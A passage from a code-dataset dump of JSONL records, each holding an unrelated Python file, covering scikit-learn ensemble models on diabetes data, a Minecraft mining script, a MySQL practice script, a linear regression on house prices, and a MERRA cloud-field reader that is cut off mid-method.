command=root.destroy)\n self.QUIT.grid()\n\n \nroot = Tk()\nroot.title(\"Majority Rules\")\nroot.geometry()\n\napp = Application(root)\n\nroot.mainloop()\n","sub_path":"tkinter_enter_searchterm.py","file_name":"tkinter_enter_searchterm.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"137583251","text":"\r\n\r\nimport pandas as pd\r\ndiabetes_data = pd.read_csv(\"E:/360digiTMG assignment/Data Science/Ensemble technique/Datasets_ET/Diabeted_Ensemble.csv\")\r\n\r\n# Input and Output Split\r\npredictors = diabetes_data.loc[:, diabetes_data.columns!=\" Class variable\"]\r\ntype(predictors)\r\n\r\ntarget = diabetes_data[\" Class variable\"]\r\ntype(target)\r\n\r\n# Train Test partition of the data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test = train_test_split(predictors, target, test_size = 0.2, random_state=0)\r\n\r\n# GridSearchCV\r\n\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nrf_clf_grid = RandomForestClassifier(n_estimators=500, n_jobs=1, random_state=42)\r\n\r\nparam_grid = {\"max_features\": [4, 5, 6, 7, 8, 9, 10], \"min_samples_split\": [2, 3, 10]}\r\n\r\ngrid_search = GridSearchCV(rf_clf_grid, param_grid, n_jobs = -1, cv = 5, scoring = 'accuracy')\r\n\r\ngrid_search.fit(x_train, y_train)\r\n\r\ngrid_search.best_params_\r\n\r\ncv_rf_clf_grid = grid_search.best_estimator_\r\n\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\n\r\nconfusion_matrix(y_test, cv_rf_clf_grid.predict(x_test))\r\naccuracy_score(y_test, cv_rf_clf_grid.predict(x_test))\r\n\r\n#Bagging technique\r\nfrom sklearn import tree\r\nclftree = tree.DecisionTreeClassifier()\r\nfrom sklearn.ensemble import BaggingClassifier\r\n\r\nbag_clf = BaggingClassifier(base_estimator = clftree, n_estimators = 500,\r\n bootstrap = True, n_jobs = 1, random_state = 42)\r\n\r\nbag_clf.fit(x_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\n\r\n# Evaluation on Testing Data\r\nconfusion_matrix(y_test, bag_clf.predict(x_test))\r\naccuracy_score(y_test, bag_clf.predict(x_test))\r\n\r\n# Evaluation on Training Data\r\nconfusion_matrix(y_train, bag_clf.predict(x_train))\r\naccuracy_score(y_train, bag_clf.predict(x_train))\r\n\r\n#AdaBoosting technique\r\nfrom sklearn.ensemble import AdaBoostClassifier\r\n\r\nada_clf = AdaBoostClassifier(learning_rate = 0.02, n_estimators = 5000)\r\n\r\nada_clf.fit(x_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\n\r\n# Evaluation on Testing Data\r\nconfusion_matrix(y_test, ada_clf.predict(x_test))\r\naccuracy_score(y_test, ada_clf.predict(x_test))\r\n\r\n# Evaluation on Training Data\r\nconfusion_matrix(y_train, ada_clf.predict(x_train))\r\naccuracy_score(y_train, ada_clf.predict(x_train))\r\n\r\n#Grddient boosting\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\n\r\nboost_clf = GradientBoostingClassifier()\r\n\r\nboost_clf.fit(x_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\n\r\n# Evaluation on Testing Data\r\nconfusion_matrix(y_test, boost_clf.predict(x_test))\r\naccuracy_score(y_test, boost_clf.predict(x_test))\r\n\r\n# Evaluation on Training Data\r\nconfusion_matrix(y_train, boost_clf.predict(x_train))\r\naccuracy_score(y_train, boost_clf.predict(x_train))\r\n\r\n# Hyperparameters\r\nboost_clf2 = GradientBoostingClassifier(learning_rate = 0.02, n_estimators = 1000, max_depth = 1)\r\nboost_clf2.fit(x_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\n\r\n# Evaluation on Testing Data\r\nconfusion_matrix(y_test, boost_clf2.predict(x_test))\r\naccuracy_score(y_test, boost_clf2.predict(x_test))\r\n\r\n# Evaluation on Training Data\r\nconfusion_matrix(y_train, boost_clf2.predict(x_train))\r\naccuracy_score(y_train, boost_clf2.predict(x_train))\r\n\r\n#XGBoosting\r\nimport xgboost as xgb\r\n\r\nxgb_clf = xgb.XGBClassifier(max_depths = 5, n_estimators = 10000, learning_rate = 0.3, n_jobs = -1)\r\n\r\nxgb_clf.fit(x_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix\r\n\r\n# Evaluation on Testing Data\r\nconfusion_matrix(y_test, xgb_clf.predict(x_test))\r\naccuracy_score(y_test, xgb_clf.predict(x_test))\r\n\r\n# Evaluation on Training Data\r\nconfusion_matrix(y_train, xgb_clf.predict(x_train))\r\naccuracy_score(y_train, xgb_clf.predict(x_train))\r\n\r\n#Voting technique\r\n# Import the required libraries\r\nfrom sklearn import linear_model, svm, neighbors, naive_bayes\r\nfrom sklearn.ensemble import VotingClassifier\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n# Instantiate the learners (classifiers)\r\nlearner_1 = neighbors.KNeighborsClassifier(n_neighbors=5)\r\nlearner_2 = linear_model.Perceptron(tol=1e-2, random_state=0)\r\nlearner_3 = svm.SVC(gamma=0.001)\r\n\r\n# Instantiate the voting classifier\r\nvoting = VotingClassifier([('KNN', learner_1),\r\n ('Prc', learner_2),\r\n ('SVM', learner_3)])\r\n\r\n# Fit classifier with the training data\r\nvoting.fit(x_train, y_train)\r\n\r\n# Predict the most voted class\r\nhard_predictions = voting.predict(x_test)\r\n\r\n# Accuracy of hard voting\r\nprint('Hard Voting:', accuracy_score(y_test, hard_predictions))\r\n\r\n# Soft Voting\r\n# Instantiate the learners (classifiers)\r\nlearner_4 = neighbors.KNeighborsClassifier(n_neighbors = 5)\r\nlearner_5 = naive_bayes.GaussianNB()\r\nlearner_6 = svm.SVC(gamma = 0.001, probability = True)\r\n\r\n# Instantiate the voting classifier\r\nvoting = VotingClassifier([('KNN', learner_4),\r\n ('NB', learner_5),\r\n ('SVM', learner_6)],\r\n voting = 'soft')\r\n\r\n# Fit classifier with the training data\r\nvoting.fit(x_train, y_train)\r\nlearner_4.fit(x_train, y_train)\r\nlearner_5.fit(x_train, y_train)\r\nlearner_6.fit(x_train, y_train)\r\n\r\n# Predict the most probable class\r\nsoft_predictions = voting.predict(x_test)\r\n\r\n# Get the base learner predictions\r\npredictions_4 = learner_4.predict(x_test)\r\npredictions_5 = learner_5.predict(x_test)\r\npredictions_6 = learner_6.predict(x_test)\r\n\r\n# Accuracies of base learners\r\nprint('L4:', accuracy_score(y_test, predictions_4))\r\nprint('L5:', accuracy_score(y_test, predictions_5))\r\nprint('L6:', accuracy_score(y_test, predictions_6))\r\n\r\n# Accuracy of Soft voting\r\nprint('Soft Voting:', accuracy_score(y_test, soft_predictions))\r\n","sub_path":"diabetes.py","file_name":"diabetes.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"291588959","text":"# ispred lika crta more baklji po tlu\n\nimport time\nfrom mc import * # import api-ja\nfrom crtanje import * # tu je funkcija koju zovem\n\nmc = Minecraft() # inicijalizacija sustava za rad sa Minecraftom\nimport time\n\nzaObradu = [GRASS.id, SANDSTONE.id, SAND.id, STONE.id, DIRT.id, GRAVEL.id, COBBLESTONE.id, CLAY.id, GOLD_ORE.id,\n IRON_ORE.id, COAL_ORE.id, DIAMOND_ORE.id, OBSIDIAN.id, REDSTONE_ORE.id, LAPIS_LAZULI_ORE.id,\n 129] # 129 emerald\n\npopis = dict()\n\n\ndef stoneCutter(orMj, orSm, dimenzije=5, visina=5):\n a = 1\n for dY in range(visina, -1, -1):\n mc.postToChat(\"Level: %s \" % dY)\n for dZ in range(-3 - dY, 3 + dY):\n for dX in range(1, dimenzije + 1 + dY):\n a += 1\n\n gdje = rel2abs((int(orMj[0]), int(orMj[1]), int(orMj[2])), (dX, dZ, dY), orSm)\n # id = mc.spawnEntity('Minecart', int (gdje [0]) ,int (gdje [1]) ,int (gdje [2]) , \"{Type:0}\" )\n # block = getBlockWithData( int (gdje [0]) ,int (gdje [1]) ,int (gdje [2]))\n myBlock = mc.getBlockWithData(int(gdje[0]), int(gdje[1]), int(gdje[2]))\n myBlock = mc.getBlockWithData(int(gdje[0]), int(gdje[1]), int(gdje[2]))\n\n if myBlock.id in (10, 11): # makni lavu\n mc.setBlock(int(gdje[0]), int(gdje[1]), int(gdje[2]), AIR.id, 0)\n if myBlock.id in zaObradu:\n a = a + 1\n # time.sleep ( 0.5 )\n mc.setBlock(int(gdje[0]), int(gdje[1]), int(gdje[2]), AIR.id, 0)\n\n if popis.has_key((myBlock.id, myBlock.data)):\n popis[(myBlock.id, myBlock.data)] += 1\n else:\n popis[(myBlock.id, myBlock.data)] = 1\n\n\n\n\n\n # time.sleep ( 0.5 )\n # myId = mc.spawnEntity('Item', int (gdje [0]) ,int (gdje [1]) ,int (gdje [2] ) , sto )\n\n for bla in popis.keys():\n blok = bla[0]\n modifikacija = bla[1]\n # prijevodi:\n # diamond\n # 56 : 264,\n if bla[0] == 56:\n blok = 264\n # redstone\n # 73 : 331 ,\n if bla[0] == 73:\n blok = 331\n # lapis\n # 21 : 351 , 4\n if bla[0] == 21:\n blok = 351\n modifikacija = 4\n # emerald\n # 129 : 388\n if bla[0] == 129:\n blok = 388\n # coal COAL_ORE.id 263\n if bla[0] == COAL_ORE.id:\n blok = 263\n modifikacija = 0\n\n mc.postToChat(\"Key: %s %s \" % (bla[0], bla[1]))\n mc.postToChat(\"Value: %s \" % popis[bla])\n while popis[bla] > 0:\n if popis[bla] > 64:\n sto = ('{Item:{id:%s,Count:%s,Damage:%s}}' % (blok, 64, modifikacija))\n else:\n sto = ('{Item:{id:%s,Count:%s,Damage:%s}}' % (blok, popis[bla], modifikacija))\n\n mc.postToChat(\"XXX: %s \" % (sto))\n gdje = rel2abs(orMj, (0, 0, 3), orSm)\n time.sleep(6)\n myId = mc.spawnEntity('Item', int(gdje[0]), int(gdje[1]), int(gdje[2]), sto)\n popis[bla] -= 64\n\n mc.postToChat(\"Kraj : XXXXXXXXXXXX\")\n return 1\n\n\nif __name__ == \"__main__\": # direktan poziv\n orMj = gdjeSam()\n orSm = gdjeGledam()\n stoneCutter(orMj, orSm, dimenzije=35, visina=5)\n # bakljada (dimenzije = 200 , visina = 80)\n","sub_path":"dugiStoneCutter.py","file_name":"dugiStoneCutter.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"202494647","text":"from office365.runtime.client_value import ClientValue\n\n\nclass Folder(ClientValue):\n\n def __init__(self, childCount=None, view=None):\n \"\"\"\n\n :param int childCount:\n :param office365.onedrive.folderView.FolderView view:\n \"\"\"\n super(Folder, self).__init__()\n self.childCount = childCount\n self.view = view\n","sub_path":"office365/onedrive/folder.py","file_name":"folder.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"480263024","text":"# coding=utf8\n\nimport argparse\nimport numpy as np\nfrom tensorflow.python import pywrap_tensorflow\n\n\ndef fetch(checkpoint_path, tensor_name, save_path=None):\n reader = pywrap_tensorflow.NewCheckpointReader(checkpoint_path)\n var_to_shape_map = reader.get_variable_to_shape_map()\n target_tensor = None\n for key in var_to_shape_map:\n if tensor_name == key:\n target_tensor = reader.get_tensor(key)\n break\n print(target_tensor)\n if save_path and isinstance(target_tensor, np.ndarray):\n np.save(save_path, target_tensor)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--checkpoint\", help=\"Checkpoint path\", required=True)\n parser.add_argument(\"--tensor\", help=\"Tensor name\", required=True)\n parser.add_argument(\"--save\", help=\"Save path\", required=False)\n args = parser.parse_args()\n\n fetch(args.checkpoint, args.tensor, args.save)\n","sub_path":"baseline_with_case/tools/fetch_embedding_from_checkpoint.py","file_name":"fetch_embedding_from_checkpoint.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"363733558","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 12 12:02:57 2017\n\n@author: fmonnery\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndatas = pd.read_csv('D:\\WorkSpace\\_Machine_Learning\\house_data.csv')\n\ndata = datas.dropna()\nZ = data.isnull().sum().sum() \n \nt=data['surface']\nx=data['price']\ny=data['arrondissement']\n\nprint(\"----------------------Calcul des coefficients---------\")\nXi=np.matrix([np.ones(data.shape[0]),data['surface'].as_matrix(),y.as_matrix()]).T\nYi=np.matrix(data['price']).T\n\nThetus = np.linalg.inv(Xi.T.dot(Xi)).dot(Xi.T).dot(Yi)\n\nAbscisse=[0,400]\nOrdonnee=[Thetus.item(0)+Abscisse[0]*Thetus.item(1),Thetus.item(0)+Abscisse[1]*Thetus.item(1)]\nDim_Z = [Thetus.item(0)+Abscisse[0]*Thetus.item(2),Thetus.item(0)+Abscisse[1]*Thetus.item(2)]\n\nprint(\"Origine : \",Thetus.item(0))\nprint(\"Coefficient n° 1 : \",Thetus.item(1))\nprint(\"Coefficient n° 2 : \",Thetus.item(2))\n\nprint(\"----------------------Représentation en 3 dimensions---------\")\nax = plt.subplot(111, projection='3d')\nax.scatter(t,x,c=y)\nax = plt.plot(Abscisse,Ordonnee,Dim_Z,linestyle='--',c='#000000')\n\nplt.legend(y)\nplt.show()\n\nprint(\"----------------------Représentation sur 2 dimensions---------\")\nasc = plt.scatter(t,x,c=y)\nasc = plt.plot(Abscisse,Ordonnee,linestyle='--',c='#000000')\nplt.show()\n\nprint(\"----------------------Calcul de la qualité du modèle---------\")\nMat = np.matrix([t.as_matrix(),y.as_matrix(),x.as_matrix()])\ni=0\nprediction = np.empty(data.shape[0])\nerreur = np.empty(data.shape[0])\n\nwhile i < data.shape[0]:\n prediction[i] = Thetus.item(0) + Mat[0].item(i)*Thetus.item(1) + Mat[1].item(i)*Thetus.item(2)\n erreur[i] = np.sqrt((prediction[i] - Mat[2].item(i))**2)\n i += 1 \n\nresidu = erreur.mean() \n\nprint (\"Erreur de prédiction moyenne : \",residu) \nprint (\"Erreur de prédiction cumulée : \",erreur.sum()) \n\ndonnees = np.asarray(Yi).reshape(-1)\n\nCompare = np.matrix([donnees,prediction,erreur])\n\nprint(\"----------------------Prédiction sur données---------\")\nprint(\"Prix du loyer pour une surface de 50 m² : \",Thetus.item(0) + 50*Thetus.item(1) + 10*Thetus.item(2))\n\n\n\n\n\n\n \n \n \n\n \n\n\n\n","sub_path":"OpenClassRoom - Data Scientist/2017-05-25 - Regression Lineaire/1-Representation-Data.py","file_name":"1-Representation-Data.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"63031990","text":"#! /usr/bin/python\n\ndef goodness_of_fit(a1, a2):\n\n import math\n\n diff2 = [(x-y)**2 for x,y in zip(a1,a2)]\n return math.sqrt(sum(diff2)/(max(a1)-min(a1))**2/len(a1))\n\ndef main():\n\n import os\n import imp\n enrs = imp.load_source('enrs',os.environ['RICH_ROOT']+'/analytic/enrs.py')\n\n import numpy\n import h5py\n\n left = enrs.Primitive(1,10,0);\n right = enrs.Primitive(1,1,0);\n prof = enrs.RiemannProfile(left,right,5./3.)\n offset = 0.5\n\n h5file = h5py.File('final.h5','r')\n t = h5file['time']\n x = h5file['grid']\n d = h5file['density']\n p = h5file['pressure']\n v = h5file['x_velocity']\n da = [prof.CalcPrim((i-offset)/t).Density for i in x]\n pa = [prof.CalcPrim((i-offset)/t).Pressure for i in x]\n va = [prof.CalcPrim((i-offset)/t).Velocity for i in x]\n\n gof1 = goodness_of_fit(d,da)\n gof2 = goodness_of_fit(p,pa)\n gof3 = goodness_of_fit(v,va)\n\n f = open('gradesheet.txt','w')\n f.write(str(gof1)+'\\n')\n f.write(str(gof2)+'\\n')\n f.write(str(gof3)+'\\n')\n f.close()\n\n return gof1<0.14 and gof2<0.06 and gof3 < 0.13\n\nif __name__=='__main__':\n \n import os\n\n if main():\n os.system('touch test_passed.res')\n else:\n os.system('touch test_failed.res')\n\n","sub_path":"lib/SurfacingAlgorithms/huji-rich-Elad3DFast/tests/newtonian/one_dimensional/riemann_profiles_1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"199128378","text":"import MySQLdb\n\n\n# 打开数据库\ndb = MySQLdb.connect(\"localhost\", \"testuser\", \"testuser123\", \"TESTDB\")\n\n\n# 使用cursor()方法获取操作游标\ncursor = db.cursor()\n\n# 使用execute方法执行sql语句\ncursor.execute(\"SELECT VERSION()\")\n\n# 如果数据库表已经存在使用 execute() 方法删除表\ncursor.execute(\"DROP TABLE IF EXISTS EMPLOYEE\")\n\n# 创建数据表SQL 语句\nsql = \"\"\"CREATE TABLE EMPLOYEE(\n FRIST_NAME CHAR(20) NOT NULL,\n LAST_NAME CHAR(20),\n AGE INT,\n SEX CHAR(1),\n INCOME FLOAT)\"\"\"\ncursor.execute(sql) \n\n\n# 使用fetchone()方法获取一条数据\ndata = cursor.fetchone()\n\n\n# SQL 插入语句\nsql = \"\"\"INSERT INTO EMPLOYEE(FIRST_NAME,LAST_NAME,AGE,SEX,INCOME)\n VALUES('MAC','Mohan',20,'M', 2000)\"\"\"\n\ntry:\n # 执行sql语句\n cursor.execute(sql)\n\n # 获取所有记录列表\n results = cursor.fetchall()\n for row in results:\n fname = row[0]\n lname = row[1]\n age = row[2]\n sex = row[3]\n income = row[4]\n print(\"fname=%s, lname=%s, age=%d, sex=%s, income=%d\" % \\\n (fname, lname, age, sex, income))\n # 提交到数据库\n db.commit()\nexcept:\n print(\"Error: unable to fetch data\")\n # rollback in case there is any error\n db.rollback() \n\n\nprint(\"database version : %s\" % data)\n\n# 关闭数据库\n\ndb.close()","sub_path":"practice-mysql.py","file_name":"practice-mysql.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"193496508","text":"fact = {}\ndef Factorial(a):\n\tif a <= 1:\n\t\treturn 1\n\telse:\n\t\treturn a * Factorial(a - 1)\n\nfor i in range(0, 10):\n\tfact[i] = Factorial(i)\n\ne = 10\nfor i in range(11, 1000000):\n\tsummation = 0\n\tif i % (e * 10) == 0:\n\t\te *= 10\n\tj = 1\n\twhile True:\n\t\tsummation += fact[int(i / j) % 10]\n\t\tif summation > i:\n\t\t\tbreak\n\t\telif j == e:\n\t\t\tbreak\n\t\tj *= 10\n\tif summation == i:\n\t\tprint(i)\n","sub_path":"Dfact.py","file_name":"Dfact.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"581332553","text":"class Solution(object):\n def maxProduct(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n\n ret = nums[0]\n max_l = [nums[0]]\n min_l = [nums[0]]\n\n for i in range(1, len(nums)):\n max_now = max((max_l[i - 1] * nums[i], min_l[i - 1] * nums[i], nums[i]))\n min_now = min((max_l[i - 1] * nums[i], min_l[i - 1] * nums[i], nums[i]))\n ret = max(ret, max_now)\n max_l.append(max_now)\n min_l.append(min_now)\n\n return ret\n","sub_path":"leetcode/algorithm/maximum-product-subarray.py","file_name":"maximum-product-subarray.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"131437114","text":"#!usr/bin/env python\nfrom calendar import monthrange\nimport h5py\nimport os\nfrom os.path import join, realpath, dirname, exists\nfrom netCDF4 import Dataset\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.cm import ScalarMappable\nfrom matplotlib.colors import Normalize\n\nfrom ..utils import time_utils\nfrom ..utils import orbit_utils\n\nfrom .earthdata import re_km\n\nimport warnings\n\n# location of MERRA files\nmerra_dir = realpath(join(dirname(__file__), '..', '..', 'MERRA_Data'))\nfilepath = join(\n merra_dir, '{Y}', '{m}', 'MERRA2_400.tavg3_3d_asm_Nv.{strf8}.nc4')\n\n# lat and lon resolutions of merra data\nlonres = 0.625\nlatres = 0.5\n\n\nclass Clouds(object):\n \"\"\"\n The Clouds class transfers data from MERRA-2\n HDF5 files into class attributes to be used \n in other parts of the code. \n \n One of the most important aspects of this class\n is its ability to interpolate cloud fractions \n between the times provided in the files.\n \n Also contains a plotting method to show the \n global cloud cover.\n \"\"\"\n \n def __init__(self, time):\n \"\"\"\n Initialize the Clouds instance.\n \n args:\n \n time - time_utils.Time instance. The\n time associated with the cloud\n data to be read in. As MERRA \n comes in daily files, only the\n year, month and date of the time\n instance are considered\n \"\"\"\n # get the filename for the date in question\n self.fname = filepath.format(Y=time.strftime(\"%Y\"), m=time.strftime(\"%m\"), strf8=time.strftime(\"%Y%m%d\"))\n if not os.path.exists(self.fname):\n raise IOError(\"Specified MERRA data file {0} does not exist\".format(self.fname))\n print(\"Reading cloud data from MERRA file\", self.fname)\n self.merra = Dataset(self.fname, 'r')\n\n # save MERRA datasets as attributes\n # suppress some weird warning: valid_range not used since it cannot be safely cast to variable data type\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n self.time = self.merra.variables[\"time\"][:]\n self.cloud = self.merra.variables[\"CLOUD\"][:]\n \n \n # Get the times corresponding to each time step in the dataset\n if type(time) == type(dt.datetime(2015,5,5)):\n time = time_utils.Time(time, time)\n d0 = dt.datetime(time.datetime.year, time.datetime.month, time.datetime.day, 1, 30)\n t0 = time_utils.Time(d0, time.ref)\n self.times = [t0 + 60*t for t in self.time]\n \n \n # take the maximum value along the vertical axis\n self.cloud = np.amax(self.cloud, axis=1)\n \n \n # append the first column of lons to the end, \n # so that locations in the range (179.6875 E, 180 E]\n # can get assigned the proper cloud fraction values\n first_cld = np.array([np.vstack(self.cloud[k,:,0]) for k in range(self.cloud.shape[0])])\n self.cloud = np.append(self.cloud, first_cld, axis=2)\n \n def __call__(self, time):\n \"\"\"\n Perform a linear interpolation of \n the cloud data along the time axis.\n \n args:\n \n time - time_utils.Time instance. The\n exact time the data will get\n interpolated to. If the time \n falls outside the first and last\n time steps, then the first or\n last set of values will be returned\n \"\"\"\n # return the first timestep's array for low values\n if type(time) == type(dt.datetime(2015,5,5)):\n time = time_utils.Time(time, time)\n \n if time.datetime <= self.times[0].datetime:\n return self.cloud[0,:,:]\n \n # return the last timestep's array for high values\n elif time.datetime > self.times[-1].datetime:\n return self.cloud[-1,:,:]\n \n else:\n # find the time steps that bound the new time\n for k in range(len(self.times)-1):\n if self.times[k].datetime < time.datetime <= self.times[k+1].datetime:\n lower = k\n upper = k+1\n \n # create the weights for the intepolation\n tlower = 0\n tupper = self.times[upper] - self.times[lower]\n t = time - self.times[lower]\n \n wlower = (t - tupper)/(tlower-tupper)\n wupper = (t - tlower)/(tupper-tlower)\n \n # interpolate cloud values to the new time\n cld = wlower*self.cloud[lower,:,:] + wupper*self.cloud[upper,:,:]\n \n return cld\n \n \n def show_clouds_ortho(self, time, centre, map_bkgd='bluemarble', out='show'):\n \"\"\"\n Show an orthographic projection with \n cloud cover that ranges from transparent\n for small cloud fraction, to white to\n grey.\n \n args:\n \n time - time_utils.Time instance that the\n cloud field will get interpolated to\n and shown for.\n \n centre - tuple of (lat, lon), indicating the\n centre of the orthographic projection\n \n map_bkgd - string to indicate what kind of back-\n ground will be used for the image. \n Can be any of 'bluemarble', 'etopo',\n or 'mask'\n \n out - string to indicate what kind of output\n should be provided\n \"\"\"\n if type(time) == type(dt.datetime(2015, 4, 4)):\n time = time_utils.Time(time, time)\n\n def col(x):\n \"\"\"\n Function that provides RGBA values\n for a given cloud fraction between\n 0 and 1. \n \"\"\"\n \n # get RGB value\n c = 1. - 0.3*x**2.\n \n # transparent if c.f. < 0.1\n if x < 0.1:\n return (c,c,c,0)\n \n # opaque if c.f. > 0.7\n elif x > 0.7:\n return (c,c,c,1.)\n \n # translucent if 0.1 < c.f. < 0.7\n else:\n return (c,c,c,np.clip((x - 0.1)/0.7, 0., 1.)**2.)\n \n # draw map projection\n projection = Basemap(projection='ortho', lat_0=centre[0], lon_0=centre[1], resolution='c')\n \n # determine what kind of background\n # is needed, and draw it\n if map_bkgd == 'bluemarble':\n projection.bluemarble()\n elif map_bkgd == 'etopo':\n projection.etopo()\n elif map_bkgd == 'mask':\n projection.drawlsmask(land_color='limegreen', ocean_color='dodgerblue', resolution='l')\n \n projection.drawcoastlines(linewidth=0.75)\n projection.drawcountries(linewidth=0.5)\n projection.drawmeridians(np.arange(-180, 181, 30), latmax=90)\n projection.drawparallels(np.arange(-90, 91, 15), latmax=90)\n else:\n raise ValueError('invalid map background specification')\n \n # use a call to interpolate the cloud \n # fields to the needed time \n cf = self(time)\n\n # define MERRA lat and lon grid\n lats = np.arange(-90., 90.25, 0.5)\n lons = np.arange(-180., 180.3125, 0.625)\n lons, lats = np.meshgrid(lons, lats)\n \n # define contour levels and colors\n levs = np.linspace(0,1,256, endpoint=True)\n clevs = [col(x) for x in levs]\n \n # get the map projection coordinates\n # and mask the cloud data, so that lcoations\n # on the opposite side of th Earth don't get\n # drawn\n x, y = projection(lons, lats)\n \n cfmask = np.ma.masked_greater(x, 1e15).mask\n cfmasked = np.ma.array(cf, mask=cfmask)\n \n # draw contour\n plt.contourf(x, y, cfmasked, levs, colors=clevs, extend='both')\n \n # supply specified output\n if out == 'show':\n plt.show()\n elif out == '':\n pass\n else:\n plt.savefig(out)\n return cfmask\n\n def get_clouds(self, time, centre, map_bkgd='bluemarble', out='show'):\n \"\"\"show_clouds_ortho, but without the plotting stuff\"\"\"\n # use a call to interpolate the cloud \n # fields to the needed time \n cf = self(time)\n return cf\n\nclass CloudCollection(object):\n \n \"\"\"\n Very Similar class to the above Clouds, but\n the CloudCollection class has the ability to\n concatenate arrays from multiple MERRA files,\n so that more than 1 day's worth of values can\n be collected.\n \n The methods to interpolate to specfied times\n and to show an orthographic projection of the\n cloud field values are repeated as well.\n \"\"\"\n \n def __init__(self, time_middle, obs_period):\n \"\"\"\n Intialize the CloudCollention instance.\n \n args:\n \n time_middle - the midpoint in time of the\n period for which cloud fields\n are needed\n \n obs_period - The total length of time for which\n the cloud fields are needed. Units\n are in seconds\n \"\"\"\n print(\"Opening cloud files for a time interval centered at {} UTC\".format(time_middle.datetime))\n \n self.time_middle = time_middle\n self.obs_period = obs_period\n \n # find the endpooints of the time period\n obs_start = time_middle - (obs_period//2+3600)\n obs_end = time_middle + (obs_period//2+3600)\n self.obs_start = obs_start\n self.obs_end = obs_end\n \n # The first time step in the MERRA daily files\n # is at 01:30 UTC, and the final one is at 22:30\n # UTC. Therefore, if the endpoints sit outside this\n # range, an extra day will have to be loaded so \n # that all the necessary interpolations can be done\n merra_start = dt.datetime(obs_start.datetime.year, obs_start.datetime.month, obs_start.datetime.day, 1, 30)\n merra_end = dt.datetime(obs_end.datetime.year, obs_end.datetime.month, obs_end.datetime.day, 22, 30)\n \n # check if the starting point occurs\n # before 01:30 UTC\n if obs_start.datetime < merra_start:\n merra_start -= dt.timedelta(seconds=86400)\n \n # check if the ending point occurs\n # after 22:30 UTC \n if obs_end.datetime > merra_end:\n merra_end += dt.timedelta(seconds=86400)\n \n # append all the necessary dates to a list\n dates = []\n cdate = merra_start.date()\n while cdate <= merra_end.date():\n dates.append(dt.datetime(cdate.year, cdate.month, cdate.day, 12))\n cdate += dt.timedelta(days=1)\n \n # create a cloud instance for each day,\n # and concatenate their arrays together\n # to get the full arrays for the CloudCollection \n clouds = []\n for d in dates:\n t = time_utils.Time(d, time_middle.ref)\n clouds.append(Clouds(t))\n \n self.cloud = np.concatenate([c.cloud for c in clouds], axis=0)\n self.times = np.concatenate([c.times for c in clouds])\n \n \n def __call__(self, time):\n \"\"\"\n Equivalent Function to the call method\n for Clouds. Interpolates cloud fields to\n the specified time\n \"\"\"\n if time.datetime < self.obs_start.datetime or time.datetime > self.obs_end.datetime:\n raise ValueError(\"Specified time is outside the observation period\")\n else:\n for k in range(len(self.times)-1):\n if self.times[k].datetime < time.datetime <= self.times[k+1].datetime:\n lower = k\n upper = k+1\n \n tlower = 0\n tupper = self.times[upper] - self.times[lower]\n t = time - self.times[lower]\n \n wlower = (t - tupper)/(tlower-tupper)\n wupper = (t - tlower)/(tupper-tlower)\n \n cld = wlower*self.cloud[lower,:,:] + wupper*self.cloud[upper,:,:]\n \n return cld\n \n def show_clouds_ortho(self, time, center, map_bkgd='bluemarble', out='show'):\n \"\"\"\n Equivalent function to the show function\n in Clouds. provide a map of the cloud fields\n at the specified time\n \"\"\"\n def col(x):\n \n c = 1. - 0.3*x**2.\n \n if x < 0.1:\n return (c,c,c,0)\n elif x > 0.8:\n return (c,c,c,1.)\n else:\n return (c,c,c,np.clip((x - 0.1)/0.7, 0., 1.)**2.)\n \n \n \n projection = Basemap(projection='ortho', lat_0=center[0], lon_0=center[1], resolution='l') \n \n if map_bkgd == 'bluemarble':\n projection.bluemarble(zorder=1)\n elif map_bkgd == 'etopo':\n projection.etopo(zorder=1)\n elif map_bkgd == 'mask':\n projection.drawlsmask(land_color='limegreen', 